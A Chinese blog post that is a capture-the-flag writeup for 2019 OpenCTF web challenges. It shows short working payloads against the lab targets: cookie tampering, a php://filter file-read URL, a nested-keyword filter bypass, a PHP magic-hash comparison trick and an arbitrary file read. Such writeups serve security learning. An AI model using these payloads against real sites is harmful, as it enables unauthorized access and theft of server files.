美文网首页CTF
2019 Openctf Web WriteUp

2019 Openctf Web WriteUp

作者: Eumenides_62ac | 来源:发表于2019-10-05 16:39 被阅读0次

i_love_cookie

id=guest,改成id=admin即可。

proxy

看到一个链接:

/index.php?url=http://naver.com

猜测是文件包含,可以读到admin.php

/index.php?url=php://filter/read=convert.base64-encode/resource=admin.php
<?php
    $flag = 'flag{basic_SSRF_XDDDDDDD}';
    if($_SERVER['REMOTE_ADDR'] === '127.0.0.1' || $_SERVER['REMOTE_ADDR'] === 'localhost' || $_SERVER['REMOTE_ADDR'] === '::1'){
        echo $flag;
    }
    else{
        echo 'hmm? you are not local ip';
    }

这题原意是ssrf吧。

easy_Web

看到一个id,尝试输入:id=admin
看到admin被过滤了。


双写:adadminmin
只剩下n,猜测admi也被过滤了。

构造:adadmiadminmin

magic

有个source.phps

<?php
$flag = "^^";
$user_hash = $_GET['GOGO'];
if(sha1("10932435112") == md5($user_hash)){
    echo "<h1>".$flag."</h1>";
}
else{
    echo "no... -_-;";
}
?>

看下sha1("10932435112")的结果:


所以只要找个md5值也为0exxx的值就可以了。
构造:
?GOGO=QNKCDZO

readme

看到file=1.jpg


有个任意文件读取:

题目没给flag,我自己放个在根目录下:

总结

入门题目,无聊玩玩。

相关文章

  • 2019 Openctf Web WriteUp

    i_love_cookie id=guest,改成id=admin即可。 proxy 看到一个链接: 猜测是文件包...

  • HCTF两道web题目

    HCTF WEB wp 官方Writeup: [https://bysec.io/hctf/writeup.htm...

  • 2019 SUCTF Web writeup

    这次比赛滑水了,只有中午和晚上有时间看题,都是大佬们带着飞的,记录下部分Web的解题思路 0x01 CheckIn...

  • Web

    这是 ISITDTU 的一些 web 题目 来自 ISITDTU CTF 2018 部分Web题目Writeup这...

  • bugku-web-writeup

    1.web基础$_GET writeup: 输入http://120.24.86.145:8002/get/?wh...

  • Hgame2019 Web WriteUp

    easy_php 访问robots.txt,得到了img/index.php的路径,访问后得到源码: ../被过滤...

  • CyBRICS CTF 2019 WEB WriteUp

    Warmup 访问时明显有个跳转,用burp拦截一下 Bitkoff Bank 发现btc/usd互转的时候会给u...

  • 南京邮电ctf-CG-CTF—WEB—WriteUp(持续更新)

    南京邮电ctf-CG-CTF—WEB—WriteUp(持续更新) 南京邮电练习题-CTF练习题 web篇 1.签到...

  • [鹏城杯线上] web部分writeup

    [鹏城杯] web部分writeup 这次鹏城杯是真的对web不友好。 shadow 这题出的还是挺好的58.20...

  • [SHA2017](web)writeup

    [SHA2017](web) writeup Bon Appétit (100) 打开页面查看源代码,发现如下 自...

网友评论

    本文标题:2019 Openctf Web WriteUp

    本文链接:https://www.haomeiwen.com/subject/mwnspctx.html